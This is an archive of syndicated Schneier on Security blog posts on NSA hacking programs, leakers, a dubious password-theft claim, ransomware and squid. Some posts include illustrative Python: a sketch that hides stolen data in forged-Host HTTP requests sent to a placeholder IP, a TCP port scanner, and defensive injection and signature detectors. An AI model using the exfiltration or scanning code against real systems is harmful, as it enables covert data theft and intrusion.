Author Archive

Schneier on Security: Friday Squid Blogging: Squid Boats Illuminate Bangkok from Space

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Really:

To attract the phytoplankton, fishermen suspend green lights from their boats to illuminate the sea. When the squid chase after their dinner, they’re drawn closer to the surface, making it easier for fishermen to net them. Squid boats often carry up to 100 of these green lamps, which generate hundreds of kilowatts of electricity–making them visible, it appears, even from space.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Schneier on Security: Chapter 137 of My Surreal Life

Someone wrote Sherlock-Schneier fan fiction. Not slash, thank heavens. (And no, that’s not an invitation.)

Schneier on Security: The Onion on Passwords

Funny.

Schneier on Security: Disguising Exfiltrated Data

There’s an interesting article on a data exfiltration technique.

What was unique about the attackers was how they disguised traffic between the malware and command-and-control servers using Google Developers and the public Domain Name System (DNS) service of Hurricane Electric, based in Fremont, Calif.

In both cases, the services were used as a kind of switching station to redirect traffic that appeared to be headed toward legitimate domains, such as adobe.com, update.adobe.com, and outlook.com.

[...]

The malware disguised its traffic by including forged HTTP headers of legitimate domains. FireEye identified 21 legitimate domain names used by the attackers.

In addition, the attackers signed the Kaba malware with a legitimate certificate from a group listed as the “Police Mutual Aid Association” and with an expired certificate from an organization called “MOCOMSYS INC.”

In the case of Google Developers, the attackers used the service to host code that decoded the malware traffic to determine the IP address of the real destination and redirect the traffic to that location.

Google Developers, formerly called Google Code, is the search engine’s website for software development tools, APIs, and documentation on working with Google developer products. Developers can also use the site to share code.

With Hurricane Electric, the attacker took advantage of the fact that its domain name servers were configured so that anyone could register for a free account with the company’s hosted DNS service.

The service allowed anyone to register a DNS zone, which is a distinct, contiguous portion of the domain name space in the DNS. The registrant could then create A records for the zone and point them to any IP address.

Honestly, this looks like a government exfiltration technique, although it could be evidence that the criminals are getting even more sophisticated.
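The forged-Host-header trick quoted above is simple enough to sketch. This is a hypothetical illustration of the idea (made-up names, paths, and addresses), not the actual Kaba malware: the TCP connection goes to the attacker's raw IP, while the HTTP request carries a Host header for a legitimate domain so the traffic passes casual inspection in proxy logs and packet captures.

```python
# Toy sketch of disguised C2/exfiltration traffic. Hypothetical example only;
# the function name, URL path, and addresses are invented for illustration.

import base64

def build_disguised_request(c2_ip: str, forged_host: str, stolen: bytes):
    """Return (connect_target, raw_http_request) for a disguised beacon."""
    # Exfiltrated data is encoded so it passes as an opaque URL parameter.
    token = base64.urlsafe_b64encode(stolen).decode()
    request = (
        f"GET /update?id={token} HTTP/1.1\r\n"
        f"Host: {forged_host}\r\n"          # forged: a legitimate domain
        "User-Agent: Mozilla/5.0\r\n"
        "Connection: close\r\n\r\n"
    )
    # The TCP connection itself goes to the attacker's server, not to the
    # IP address that forged_host actually resolves to.
    return (c2_ip, 80), request.encode()

target, req = build_disguised_request("203.0.113.7", "update.adobe.com", b"secret")
```

A defender who only logs Host headers sees what looks like an Adobe update check; correlating the header against the destination IP's actual ownership is what exposes the mismatch.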

Schneier on Security: The Security of al Qaeda Encryption Software

The web intelligence firm Recorded Future has posted two stories about how al Qaeda is using new encryption software in response to the Snowden disclosures. NPR picked up the story a week later.

Former NSA Chief Counsel Stewart Baker uses this as evidence that Snowden has harmed America. Glenn Greenwald calls this “CIA talking points” and shows that al Qaeda was using encryption well before Snowden. Both quote me heavily, Baker casting me as somehow disingenuous on this topic.

Baker is conflating my stating of two cryptography truisms. The first is that cryptography is hard, and you’re much better off using well-tested public algorithms than trying to roll your own. The second is that cryptographic implementation is hard, and you’re much better off using well-tested open-source encryption software than you are trying to roll your own. Admittedly, they’re very similar, and sometimes I’m not as precise as I should be when talking to reporters.

This is what I wrote in May:

I think this will help US intelligence efforts. Cryptography is hard, and the odds that a home-brew encryption product is better than a well-studied open-source tool is slight. Last fall, Matt Blaze said to me that he thought that the Snowden documents will usher in a new dark age of cryptography, as people abandon good algorithms and software for snake oil of their own devising. My guess is that this is an example of that.

Note the phrase “good algorithms and software.” My intention was to invoke both truisms in the same sentence. That paragraph is true if al Qaeda is rolling their own encryption algorithms, as Recorded Future reported in May. And it remains true if al Qaeda is using algorithms like my own Twofish and rolling their own software, as Recorded Future reported earlier this month. Everything we know about how the NSA breaks cryptography is that they attack the implementations far more successfully than the algorithms.

My guess is that in this case they don’t even bother with the encryption software; they just attack the users’ computers. There’s nothing that screams “hack me” more than using specially designed al Qaeda encryption software. There’s probably a QUANTUMINSERT attack and FOXACID exploit already set on automatic fire.

I don’t want to get into an argument about whether al Qaeda is altering its security in response to the Snowden documents. Its members would be idiots if they did not, but it’s also clear that they were designing their own cryptographic software long before Snowden. My guess is that the smart ones are using public tools like OTR and PGP and the paranoid dumb ones are using their own stuff, and that the split was the same both pre- and post-Snowden.

Schneier on Security: US Air Force is Focusing on Cyber Deception

The US Air Force is focusing on cyber deception next year:

Background: Deception is a deliberate act to conceal activity on our networks, create uncertainty and confusion against the adversary’s efforts to establish situational awareness and to influence and misdirect adversary perceptions and decision processes. Military deception is defined as “those actions executed to deliberately mislead adversary decision makers as to friendly military capabilities, intentions, and operations, thereby causing the adversary to take specific actions (or inactions) that will contribute to the accomplishment of the friendly mission.” Military forces have historically used techniques such as camouflage, feints, chaff, jammers, fake equipment, false messages or traffic to alter an enemy’s perception of reality. Modern day military planners need a capability that goes beyond the current state-of-the-art in cyber deception to provide a system or systems that can be employed by a commander when needed to enable deception to be inserted into defensive cyber operations.

Relevance and realism are the grand technical challenges to cyber deception. The application of the proposed technology must be relevant to operational and support systems within the DoD. The DoD operates within a highly standardized environment. Any technology that significantly disrupts or increases the cost to the standard of practice will not be adopted. If the technology is adopted, the defense system must appear legitimate to the adversary trying to exploit it.

Objective: To provide cyber-deception capabilities that could be employed by commanders to provide false information, confuse, delay, or otherwise impede cyber attackers to the benefit of friendly forces. Deception mechanisms must be incorporated in such a way that they are transparent to authorized users, and must introduce minimal functional and performance impacts, in order to disrupt our adversaries and not ourselves. As such, proposed techniques must consider how challenges relating to transparency and impact will be addressed. The security of such mechanisms is also paramount, so that their power is not co-opted by attackers against us for their own purposes. These techniques are intended to be employed for defensive purposes only on networks and systems controlled by the DoD.

Advanced techniques are needed with a focus on introducing varying deception dynamics in network protocols and services which can severely impede, confound, and degrade an attacker’s methods of exploitation and attack, thereby increasing the costs and limiting the benefits gained from the attack. The emphasis is on techniques that delay the attacker in the reconnaissance through weaponization stages of an attack and also aid defenses by forcing an attacker to move and act in a more observable manner. Techniques across the host and network layers or a hybrid thereof are of interest in order to provide AF cyber operations with effective, flexible, and rapid deployment options.

More discussion here.

Schneier on Security: QUANTUM Technology Sold by Cyberweapons Arms Manufacturers

Last October, I broke the story about the NSA’s top secret program to inject packets into the Internet backbone: QUANTUM. Specifically, I wrote about how QUANTUMINSERT injects packets into existing Internet connections to redirect a user to an NSA web server codenamed FOXACID to infect the user’s computer. Since then, we’ve learned a lot more about how QUANTUM works, and general details of many other QUANTUM programs.

These techniques make use of the NSA’s privileged position on the Internet backbone. It has TURMOIL computers directly monitoring the Internet infrastructure at providers in the US and around the world, and a system called TURBINE that allows it to perform real-time packet injection into the backbone. Still, there’s nothing about QUANTUM that anyone else with similar access can’t do. There’s a hacker tool called AirPwn that basically performs a QUANTUMINSERT attack on computers on a wireless network.
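Because packet injection is a race against the legitimate server, it leaves a detectable artifact: the victim briefly sees two packets claiming the same TCP sequence number but carrying different contents (the spoofed answer and the late real one). A toy passive detector over a simplified flow model (the tuple format here is invented for illustration; a real monitor would work from a live capture):

```python
# Sketch of one published QUANTUMINSERT detection heuristic: flag flows where
# a single TCP sequence number was observed with two different payloads.
# Ordinary retransmissions repeat the same bytes, so they are not flagged.

from collections import defaultdict

def detect_injection(packets):
    """packets: iterable of (flow_id, tcp_seq, payload) tuples from a capture.
    Returns the flow_ids where one sequence number carried conflicting data."""
    first_payload = defaultdict(dict)      # flow_id -> {seq: first payload seen}
    suspicious = set()
    for flow, seq, payload in packets:
        if first_payload[flow].setdefault(seq, payload) != payload:
            suspicious.add(flow)           # retransmissions match; races don't
    return suspicious
```

The same check works whether the injector is the NSA, a commercial product, or AirPwn on a coffee-shop wireless network; the race is visible to anyone watching both packets arrive.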

A new report from Citizen Lab shows that cyberweapons arms manufacturers are selling this type of technology to governments around the world: the US DoD contractor CloudShield Technologies, Italy’s Hacking Team, and Germany’s and the UK’s Gamma International. These programs intercept web connections to sites like Microsoft and Google — YouTube is specifically mentioned — and inject malware into users’ computers.

Turkmenistan paid a Swiss company, Dreamlab Technologies — somehow related to the cyberweapons arms manufacturer Gamma International — just under $1M for this capability. Dreamlab also installed the software in Oman. We don’t know what other countries have this capability, but the companies here routinely sell hacking software to totalitarian countries around the world.

There’s some more information in this Washington Post article, and this essay on the Intercept.

In talking about the NSA’s capabilities, I have repeatedly said that today’s secret NSA programs are tomorrow’s PhD dissertations and the next day’s hacker tools. This is exactly what we’re seeing here. By developing these technologies instead of helping defend against them, the NSA — and GCHQ and CESG — are contributing to the ongoing insecurity of the Internet.

Related: here is an open letter from Citizen Lab’s Ron Deibert to Hacking Team about the nature of Citizen Lab’s research and the misleading defense of Hacking Team’s products.

Schneier on Security: NSA/GCHQ/CSEC Infecting Innocent Computers Worldwide

There’s a new story on the c’t magazin website about a 5-Eyes program to infect computers around the world for use as launching pads for attacks. These are not target computers; these are innocent third parties.

The article actually talks about several government programs. HACIENDA is a GCHQ program to port-scan entire countries, looking for vulnerable computers to attack. According to the GCHQ slide from 2009, they’ve completed port scans of 27 different countries and are prepared to do more.
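At its core, the port scanning described here is just a TCP connect scan run at country scale. A minimal single-host sketch of the idea (the real systems are massively parallel and far stealthier; this is illustration only):

```python
# Toy TCP connect scan: report which of the given ports accept a connection.
# connect_ex returns 0 on success and an errno value on failure, so no
# exception handling is needed for closed ports.

import socket

def connect_scan(host: str, ports, timeout: float = 0.5):
    """Return the subset of `ports` on `host` that accept a TCP connection."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports
```

Scaled up, results like these are exactly what feeds a database of candidate machines; the interesting part of HACIENDA is the scale and automation, not the scan itself.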

The point of this is to create ORBs, or Operational Relay Boxes. Basically, these are computers that sit between the attacker and the target, and are designed to obscure the true origins of an attack. Slides from the Canadian CSEC talk about how this process is being automated: “2-3 times/year, 1 day focused effort to acquire as many new ORBs as possible in as many non 5-Eyes countries as possible.” They’ve automated this process into something codenamed LANDMARK, and together with a knowledge engine codenamed OLYMPIA, 24 people were able to identify “a list of 3000+ potential ORBs” in 5-8 hours. The presentation does not go on to say whether all of those computers were actually infected.

Slides from the UK’s GCHQ also talk about ORB detection, as part of a program called MUGSHOT. It, too, is happy with the automatic process: “Initial ten fold increase in Orb identification rate over manual process.” There are also NSA slides that talk about the hacking process, but there’s not much new in them.

The slides never say how many of the “potential ORBs” CSEC discovers or the computers that register positive in GCHQ’s “Orb identification” are actually infected, but they’re all stored in a database for future use. The Canadian slides talk about how some of that information was shared with the NSA.

Increasingly, innocent computers and networks are becoming collateral damage, as countries use the Internet to conduct espionage and attacks against each other. This is an example of that. Not only do these intelligence services want an insecure Internet so they can attack each other; they also want an insecure Internet so they can use innocent third parties to help facilitate their attacks.

The story contains formerly TOP SECRET documents from the US, UK, and Canada. Note that Snowden is not mentioned at all in this story. Usually, if the documents the story is based on come from Snowden, the reporters say that. In this case, the reporters have said nothing about where the documents come from. I don’t know if this is an omission — these documents sure look like the sorts of things that come from the Snowden archive — or if there is yet another leaker.

Schneier on Security: Friday Squid Blogging: Te Papa Museum Gets a Second Colossal Squid

That’s two more than I have. They’re hoping it’s a male.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Schneier on Security: Reverse-Engineering NSA Malware

Interesting articles reverse-engineering DEITYBOUNCE and BULLDOZER.

Schneier on Security: New Snowden Interview in Wired

There’s a new article on Edward Snowden in Wired. It’s written by longtime NSA watcher James Bamford, who interviewed Snowden in Moscow.

There’s lots of interesting stuff in the article, but I want to highlight two new revelations. One is that the NSA was responsible for a 2012 Internet blackout in Syria:

One day an intelligence officer told him that TAO­ — a division of NSA hackers­ — had attempted in 2012 to remotely install an exploit in one of the core routers at a major Internet service provider in Syria, which was in the midst of a prolonged civil war. This would have given the NSA access to email and other Internet traffic from much of the country. But something went wrong, and the router was bricked instead — rendered totally inoperable. The failure of this router caused Syria to suddenly lose all connection to the Internet — although the public didn’t know that the US government was responsible….

Inside the TAO operations center, the panicked government hackers had what Snowden calls an “oh shit” moment. They raced to remotely repair the router, desperate to cover their tracks and prevent the Syrians from discovering the sophisticated infiltration software used to access the network. But because the router was bricked, they were powerless to fix the problem.

Fortunately for the NSA, the Syrians were apparently more focused on restoring the nation’s Internet than on tracking down the cause of the outage. Back at TAO’s operations center, the tension was broken with a joke that contained more than a little truth: “If we get caught, we can always point the finger at Israel.”

Other articles on Syria: http://www.nationaljournal.com/tech/snowden-the-nsa-caused-a-massive-internet-blackout-in-syria-20140813

The other is something called MONSTERMIND, which is an automatic strike-back system for cyberattacks.

The program, disclosed here for the first time, would automate the process of hunting for the beginnings of a foreign cyberattack. Software would constantly be on the lookout for traffic patterns indicating known or suspected attacks. When it detected an attack, MonsterMind would automatically block it from entering the country — a “kill” in cyber terminology.

Programs like this had existed for decades, but MonsterMind software would add a unique new capability: Instead of simply detecting and killing the malware at the point of entry, MonsterMind would automatically fire back, with no human involvement.
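The two capabilities quoted above reduce to a simple loop: match traffic against known attack signatures, block on a match, and optionally trigger an automatic response with no human in the loop. A toy rule engine makes the structure (and the danger of the automatic part) concrete; the signatures and function names are invented for illustration:

```python
# Toy MonsterMind-style engine: signature match -> "kill", optional automatic
# strike-back callback. Hypothetical signatures; real systems classify live
# flows, not byte strings.

ATTACK_SIGNATURES = {
    b"\x90\x90\x90\x90": "nop-sled",
    b"' OR 1=1--": "sqli-probe",
}

def inspect(packet: bytes, blocklist: set, strike_back=None):
    """Return 'kill' and record the matched rule, or 'pass' if clean."""
    for sig, name in ATTACK_SIGNATURES.items():
        if sig in packet:
            blocklist.add(name)
            if strike_back is not None:
                strike_back(name)   # automatic, no human involvement
            return "kill"
    return "pass"
```

Even in this toy form, the problem with automatic strike-back is visible: the callback fires on whatever source the signature match attributes, and attackers routinely launch from innocent third-party machines, exactly the ORBs discussed elsewhere on this page.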

A bunch more articles and stories on MONSTERMIND.

And there’s this 2011 photo of Snowden and former NSA Director Michael Hayden.

Schneier on Security: Security as Interface Guarantees

This is a smart and interesting blog post:

I prefer to think of security as a class of interface guarantee. In particular, security guarantees are a kind of correctness guarantee. At every interface of every kind – user interface, programming language syntax and semantics, in-process APIs, kernel APIs, RPC and network protocols, ceremonies – explicit and implicit design guarantees (promises, contracts) are in place, and determine the degree of “security” (however defined) the system can possibly achieve.

Design guarantees might or might not actually hold in the implementation – software tends to have bugs, after all. Callers and callees can sometimes (but not always) defend themselves against untrustworthy callees and callers (respectively) in various ways that depend on the circumstances and on the nature of caller and callee. In this sense an interface is an attack surface – but properly constructed, it can also be a defense surface.

[...]

But also it’s an attempt to re-frame security engineering in a way that allows us to imagine more and better solutions to security problems. For example, when you frame your interface as an attack surface, you find yourself ever-so-slightly in a panic mode, and focus on how to make the surface as small as possible. Inevitably, this tends to lead to cat-and-mouseism and poor usability, seeming to reinforce the false dichotomy. If the panic is acute, it can even lead to nonsensical and undefendable interfaces, and a proliferation of false boundaries (as we saw with Windows UAC).

If instead we frame an interface as a defense surface, we are in a mindset that allows us to treat the interface as a shield: built for defense, testable, tested, covering the body; but also light-weight enough to carry and use effectively. It might seem like a semantic game; but in my experience, thinking of a boundary as a place to build a point of strength rather than thinking of it as something that must inevitably fall to attack leads to solutions that in fact withstand attack better while also functioning better for friendly callers.
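The "defense surface" framing has a mundane concrete form: state the contract at the boundary and enforce it on every call rather than trusting callers to keep their promises. A minimal sketch (hypothetical function, not from the quoted post):

```python
# The interface states a guarantee; the implementation enforces it, so a
# caller that breaks the contract is rejected instead of corrupting state.

def transfer(amount_cents: int, balance_cents: int) -> int:
    """Contract: amount is a positive integer no larger than the balance.
    Returns the new balance. The checks below *are* the defense surface."""
    # bool is a subclass of int in Python, so exclude it explicitly.
    if not isinstance(amount_cents, int) or isinstance(amount_cents, bool):
        raise TypeError("amount must be an integer number of cents")
    if not 0 < amount_cents <= balance_cents:
        raise ValueError("amount outside the guaranteed range")
    return balance_cents - amount_cents
```

The same code serves both framings: to an attacker it is a small attack surface, but to a friendly caller it is a tested, explicit promise about what the function will and will not do.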

I also liked the link at the end.

Schneier on Security: Automatic Scanning for Highly Stressed Individuals

This borders on ridiculous:

Chinese scientists are developing a mini-camera to scan crowds for highly stressed individuals, offering law-enforcement officers a potential tool to spot would-be suicide bombers.

[...]

“They all looked and behaved as ordinary people but their level of mental stress must have been extremely high before they launched their attacks. Our technology can detect such people, so law enforcement officers can take precautions and prevent these tragedies,” Chen said.

Officers looking through the device at a crowd would see a mental “stress bar” above each person’s head, and the suspects highlighted with a red face.

The researchers said they were able to use the technology to distinguish high blood-oxygen levels produced by stress from those produced by ordinary physical exertion.

I’m not optimistic about this technology.

Schneier on Security: Irrational Fear of Risks Against Our Children

There’s a horrible story of a South Carolina mother arrested for letting her 9-year-old daughter play alone at a park while she was at work. The article linked to another article about a woman convicted of “contributing to the delinquency of a minor” for leaving her 4-year-old son in the car for a few minutes. That article contains some excellent commentary by the very sensible Free Range Kids blogger Lenore Skenazy:

“Listen,” she said at one point. “Let’s put aside for the moment that by far, the most dangerous thing you did to your child that day was put him in a car and drive someplace with him. About 300 children are injured in traffic accidents every day — and about two die. That’s a real risk. So if you truly wanted to protect your kid, you’d never drive anywhere with him. But let’s put that aside. So you take him, and you get to the store where you need to run in for a minute and you’re faced with a decision. Now, people will say you committed a crime because you put your kid ‘at risk.’ But the truth is, there’s some risk to either decision you make.” She stopped at this point to emphasize, as she does in much of her analysis, how shockingly rare the abduction or injury of children in non-moving, non-overheated vehicles really is. For example, she insists that statistically speaking, it would likely take 750,000 years for a child left alone in a public space to be snatched by a stranger. “So there is some risk to leaving your kid in a car,” she argues. “It might not be statistically meaningful but it’s not nonexistent. The problem is,” she goes on, “there’s some risk to every choice you make. So, say you take the kid inside with you. There’s some risk you’ll both be hit by a crazy driver in the parking lot. There’s some risk someone in the store will go on a shooting spree and shoot your kid. There’s some risk he’ll slip on the ice on the sidewalk outside the store and fracture his skull. There’s some risk no matter what you do. So why is one choice illegal and one is OK? Could it be because the one choice inconveniences you, makes your life a little harder, makes parenting a little harder, gives you a little less time or energy than you would have otherwise had?”

Later on in the conversation, Skenazy boils it down to this. “There’s been this huge cultural shift. We now live in a society where most people believe a child can not be out of your sight for one second, where people think children need constant, total adult supervision. This shift is not rooted in fact. It’s not rooted in any true change. It’s imaginary. It’s rooted in irrational fear.”

Skenazy has some choice words about the South Carolina story as well:

But, “What if a man would’ve come and snatched her?” said a woman interviewed by the TV station.

To which I must ask: In broad daylight? In a crowded park? Just because something happened on Law & Order doesn’t mean it’s happening all the time in real life. Make “what if?” thinking the basis for an arrest and the cops can collar anyone. “You let your son play in the front yard? What if a man drove up and kidnapped him?” “You let your daughter sleep in her own room? What if a man climbed through the window?” etc.

These fears pop into our brains so easily, they seem almost real. But they’re not. Our crime rate today is back to what it was when gas was 29 cents a gallon, according to The Christian Science Monitor. It may feel like kids are in constant danger, but they are as safe (if not safer) than we were when our parents let us enjoy the summer outside, on our own, without fear of being arrested.

Yes.

Schneier on Security: Friday Squid Blogging: Squid Proteins and the Brain-Computer Interface

There’s a protein in squid that might be useful in getting biological circuits to talk to computer circuits.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Schneier on Security: Eavesdropping by Visual Vibrations

Researchers are able to recover sound through soundproof glass by recording the vibrations of a plastic bag.

Researchers at MIT, Microsoft, and Adobe have developed an algorithm that can reconstruct an audio signal by analyzing minute vibrations of objects depicted in video. In one set of experiments, they were able to recover intelligible speech from the vibrations of a potato-chip bag photographed from 15 feet away through soundproof glass.

In other experiments, they extracted useful audio signals from videos of aluminum foil, the surface of a glass of water, and even the leaves of a potted plant.

This isn’t a new idea. I remember military security policies requiring people to close the window blinds to prevent someone from shining a laser on the window and recovering the sound from the vibrations. But both the camera and processing technologies are getting better.
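The principle can be sketched in a few lines. This is a toy simulation, not the MIT algorithm (which recovers far subtler sub-pixel motion from real video): an object vibrates in sympathy with a pure tone, a hypothetical high-speed camera samples its displacement once per frame, and a simple FFT recovers the tone from that displacement signal.

```python
import numpy as np

# Toy sketch, not the MIT algorithm: an object vibrating in sympathy
# with a 440 Hz tone, "filmed" at a hypothetical 2400 frames per second.
# The per-frame displacement is the audio signal; an FFT finds the tone.
fps = 2400
t = np.arange(0, 1.0, 1.0 / fps)
tone_hz = 440.0
rng = np.random.default_rng(0)
displacement = 1e-3 * np.sin(2 * np.pi * tone_hz * t)   # sub-pixel motion
displacement += 1e-4 * rng.standard_normal(t.size)      # camera/sensor noise

spectrum = np.abs(np.fft.rfft(displacement))
freqs = np.fft.rfftfreq(t.size, d=1.0 / fps)
recovered = freqs[np.argmax(spectrum[1:]) + 1]  # skip the DC bin
print(f"recovered tone: {recovered:.0f} Hz")
```

Ordinary video runs at 30 or 60 frames per second, far below audio sampling rates, which is why recovering intelligible speech this way requires either a high-speed camera or much cleverer signal processing than this sketch.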

News story.

Schneier on Security: Social Engineering a Telemarketer

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Okay, this is funny.

Schneier on Security: The US Intelligence Community has a <em>Third</em> Leaker

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Ever since The Intercept published this story about the US government’s Terrorist Screening Database, the press has been writing about a “second leaker”:

The Intercept article focuses on the growth in U.S. government databases of known or suspected terrorist names during the Obama administration.

The article cites documents prepared by the National Counterterrorism Center dated August 2013, which is after Snowden left the United States to avoid criminal charges.

Greenwald has suggested there was another leaker. In July, he said on Twitter “it seems clear at this point” that there was another.

Everyone’s miscounting. This is the third leaker:

  • Leaker #1: Edward Snowden.

  • Leaker #2: The person who is passing secrets to Jake Appelbaum, Laura Poitras and others in Germany: the Angela Merkel surveillance story, the TAO catalog, the X-KEYSCORE rules. My guess is that this is either an NSA employee or contractor working in Germany, or someone from German intelligence who has access to NSA documents. Snowden has said that he is not the source for the Merkel story, and Greenwald has confirmed that the Snowden documents are not the source for the X-KEYSCORE rules. I have also heard privately that the NSA knows that this is a second leaker.

  • Leaker #3: This new leaker, with access to a different stream of information (the NCTC is not the NSA), who The Intercept calls “a source in the intelligence community.”

Harvard Law School professor Yochai Benkler has written an excellent law-review article on the need for a whistleblower defense. And there’s this excellent article by David Pozen on why government leaks are, in general, a good thing.

Schneier on Security: Over a Billion Passwords Stolen?

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

I’ve been doing way too many media interviews over this weird New York Times story that a Russian criminal gang has stolen over 1.2 billion passwords.

As expected, the hype is pretty high over this. But from the beginning, the story didn’t make sense to me. There are obvious details missing: are the passwords in plaintext or encrypted, what sites are they for, how did they end up with a single criminal gang? The Milwaukee company that pushed this story, Hold Security, isn’t a company that I had ever heard of before. (I was with Howard Schmidt when I first heard this story. He lives in Wisconsin, and he had never heard of the company before either.) The New York Times writes that “a security expert not affiliated with Hold Security analyzed the database of stolen credentials and confirmed it was authentic,” but we’re not given any details. This felt more like a PR story from the company than anything real.

Yesterday, Forbes wrote that Hold Security is charging people $120 to tell them if they’re in the stolen-password database:

“In addition to continuous monitoring, we will also check to see if your company has been a victim of the latest CyberVor breach,” says the site’s description of the service using its pet name for the most recent breach. “The service starts from as low as 120$/month and comes with a 2-week money back guarantee, unless we provide any data right away.”

Shortly after Wall Street Journal reporter Danny Yadron linked to the page on Twitter and asked questions about it, the firm replaced the description of the service with a “coming soon” message.

Holden says by email that the service will actually be $10/month and $120/year. “We are charging this symbolical fee to recover our expense to verify the domain or website ownership,” he says by email. “While we do not anticipate any fraud, we need to be cognizant of its potential. The other thing to consider, the cost that our company must undertake to proactively reach out to a company to identify the right individual(s) to inform of a breach, prove to them that we are the ‘good guys’. Believe it or not, it is a hard and often thankless task.”

This story is getting squirrelier and squirrelier. Yes, security companies love to hype the threat to sell their products and services. But this goes further: single-handedly trying to create a panic, and then profiting off that panic.

I don’t know how much of this story is true, but what I was saying to reporters over the past two days is that it’s evidence of how secure the Internet actually is. We’re not seeing massive fraud or theft. We’re not seeing massive account hijacking. A gang of Russian hackers has 1.2 billion passwords — they’ve probably had most of them for a year or more — and everything is still working normally. This sort of thing is pretty much universally true. You probably have a credit card in your wallet right now whose number has been stolen. There are zero-day vulnerabilities being discovered right now that can be used to hack your computer. Security is terrible everywhere, and it’s all okay. This is a weird paradox that we’re used to by now.

Oh, and if you want to change your passwords, here’s my advice.

EDITED TO ADD (8/7): Brian Krebs vouches for Hold Security. On the other hand, they had no web presence until this story hit. Despite Krebs, I’m skeptical.

EDITED TO ADD (8/7): Here’s an article about Hold Security from February with suspiciously similar numbers.

Schneier on Security: Ubiquitous Surveillance in Singapore

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Good essay.

Schneier on Security: SynoLocker Ransomware Demands Bitcoins

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Network-attached storage devices made by Synology are being attacked, and their data encrypted, by ransomware that demands $350 in bitcoins (payable anonymously via Tor) for the decryption key. As of this moment, there’s no patch.

Schneier on Security: Former NSA Director Patenting Computer Security Techniques

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Former NSA Director Keith Alexander is patenting a variety of techniques to protect computer networks. We’re supposed to believe that he developed these on his own time and they have nothing to do with the work he did at the NSA, except for the parts where they obviously did and therefore are worth $1 million per month for companies to license.

No, nothing fishy here.

Schneier on Security: Friday Squid Blogging: Squid Nebula

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

A nebula that looks like a squid.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.